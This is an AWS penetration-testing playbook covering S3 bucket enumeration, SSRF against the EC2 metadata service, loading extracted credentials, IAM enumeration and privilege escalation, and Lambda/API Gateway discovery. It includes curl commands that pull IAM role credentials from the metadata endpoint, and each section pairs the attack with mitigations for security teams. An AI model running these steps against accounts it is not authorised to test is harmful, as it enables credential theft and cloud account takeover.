AWS

Amazon Web Services

AWS Cloud Pentesting Playbook

This playbook outlines foundational concepts of AWS architecture and provides technical guidance and attack strategies derived from practical labs and real-world exploitation scenarios. Each section includes purpose, context, exploitation techniques, AWS CLI commands, and mitigation strategies to guide red teamers, cloud security engineers, and blue teams.


1. AWS Cloud Architecture

Cloud Space Overview

Purpose: Understand AWS architectural layers and potential attack vectors.

  • Front-End: AWS Management Console (Web GUI).

  • Control Plane: Manages orchestration of AWS services (e.g., EC2 start/stop, IAM configuration).

  • Data Plane: Hosts actual data/compute resources (e.g., S3, EC2).

Security Insight:

  • Control Plane compromise = full account takeover.

  • Data Plane compromise = data exfiltration, service abuse.


2. Entry Point Identification

S3 Bucket Enumeration

Purpose: Identify open buckets leaking data.

Tools:

  • osint.sh (for domain/asset discovery)

Command:

cloudenum -k examplecorp -o results.txt

Example Attack:

http://public-examplecorp.s3.amazonaws.com/internal-ip.txt

Mitigation:

  • Disable public access unless required.

  • Enforce IAM bucket policies and block public ACLs.


3. SSRF to EC2 Metadata Extraction

Purpose: Abuse SSRF to steal instance credentials.

Target Endpoint: http://169.254.169.254/latest/meta-data/

Command Sequence:

curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

Mitigation:

  • Enable IMDSv2.

  • Restrict outbound traffic from EC2s.


4. Credential Injection and Identity Confirmation

Using Leaked/Extracted Credentials

Setup Profile:

aws configure --profile pentest-profile

Or edit ~/.aws/credentials:

[pentest-profile]
aws_access_key_id = AKIA...
aws_secret_access_key = ...
aws_session_token = ...

Verify Identity:

aws sts get-caller-identity --profile pentest-profile

Mitigation:

  • Monitor STS usage.

  • Rotate credentials regularly.


5. IAM Enumeration

Purpose: Discover all user/group/role/policy relationships.

Commands:

aws iam get-user --profile pentest-profile
aws iam list-groups-for-user --user-name dev-user --profile pentest-profile
aws iam list-roles --profile pentest-profile
aws iam list-attached-user-policies --user-name dev-user --profile pentest-profile
aws iam list-user-policies --user-name dev-user --profile pentest-profile
aws iam get-user-policy --user-name dev-user --policy-name DevPolicy --profile pentest-profile

Mitigation:

  • Regularly audit users and their permissions.

  • Restrict over-privileged accounts.


6. AWS Credential Types

Long-Term vs Short-Term Keys

Identification:

echo $AWS_ACCESS_KEY_ID
# AKIA → Long-term
# ASIA → Temporary STS

Mitigation:

  • Use IAM roles and short-term credentials.

  • Avoid hardcoding credentials.


7. Privilege Escalation Techniques

1. Create New Policy Version

iam:CreatePolicyVersion

Attack: Create a permissive version and set it as default.

2. Pass Existing Role to EC2

iam:PassRole + ec2:RunInstances

Attack: Launch EC2 with elevated role.

3. Attach Policy to Self

iam:AttachUserPolicy, iam:AttachGroupPolicy, iam:AttachRolePolicy

4. Modify Trust Policy

iam:UpdateAssumeRolePolicy

Mitigation (all):

  • Restrict risky IAM actions.

  • Monitor CloudTrail logs for policy updates.


8. API Gateway & Lambda Enumeration

Concept: Using Read-Only Permissions to Enumerate and Access Internal APIs

Step-by-Step Exploitation:

  1. Identify current user:

aws iam get-user --profile pentest-profile
  1. List attached user policies:

aws iam list-attached-user-policies --user-name <username> --profile pentest-profile
  1. Get policy ARN and version:

aws iam get-policy --policy-arn arn:aws:iam::<account>:policy/<policy-name> --profile pentest-profile
aws iam get-policy-version --policy-arn arn:aws:iam::<account>:policy/<policy-name> --version-id <version-id> --profile pentest-profile

Look for apigateway:GET permissions.

  1. List Lambda functions:

aws lambda list-functions --region us-west-2 --profile pentest-profile
  1. Get Lambda execution policy:

aws lambda get-policy --function-name <function-name> --region us-west-2 --profile pentest-profile

Reveals execute-api ARN associated with API Gateway

  1. Get API Gateway stages:

aws apigateway get-stages --rest-api-id <api-id> --region us-west-2 --profile pentest-profile
  1. Visit discovered endpoint:

https://<api-id>.execute-api.us-west-2.amazonaws.com/<stage>/<resource>

Security Insight:

  • Chained enumeration of Lambda policies and API Gateway resources allows attackers to invoke undocumented APIs.

  • Least privilege IAM roles and separation of read/write policies are critical.


9. Key Attack Scenarios Summary

Attack Vector

Tools/Technique

Goal

Public S3 Buckets

cloudenum

Find leaked configs/creds

SSRF to Metadata

curl, web exploit

Extract STS creds

IAM Enumeration & Abuse

aws iam list-*

Discover and misuse privileges

Abusing STS Temporary Tokens

aws sts

Lateral movement

Misconfigured Trust Relationships

AssumeRole abuse

Privileged role pivoting

Lambda Exposure via API Gateway

apigateway, lambda CLI

Discover and invoke hidden resources


10. AWS Services Recap (Security Lens)

IAM

  • Central identity system.

  • Monitor role assumptions.

  • Use permission boundaries and SCPs.

EC2

  • Protect metadata service (IMDSv2).

  • Monitor user-data for secrets.

S3

  • Disable public buckets.

  • Enforce bucket policies and access logs.

Lambda

  • Lock down execution policies.

  • Avoid wide API Gateway access.

API Gateway

  • Monitor stage and resource exposure.

  • Validate CORS and auth settings.

CloudTrail & GuardDuty

  • Enable full logging.

  • Alert on anomalous API usage (e.g., sts:AssumeRole, iam:PassRole).


11. AWS Pentesting Flow Summary

Reconnaissance

  • Tools: cloudenum, osint.sh, whoami

  • Targets: IAM users, S3, EC2 metadata, Lambda/APIGW

Exploitation

  • SSRF → Metadata → STS tokens

  • IAM → Privilege escalation

Post-Exploitation

  • Use AWS CLI for enumeration

  • Dump data (S3), invoke functions (Lambda), pivot roles (STS)

Lateral Movement

  • Abuse trust policies

  • Use minimal logs with aws sts assume-role


End of Playbook

This playbook emphasizes both offensive and defensive approaches to AWS environments. Proper hardening, monitoring, and the principle of least privilege are key to reducing attack surfaces.

Last updated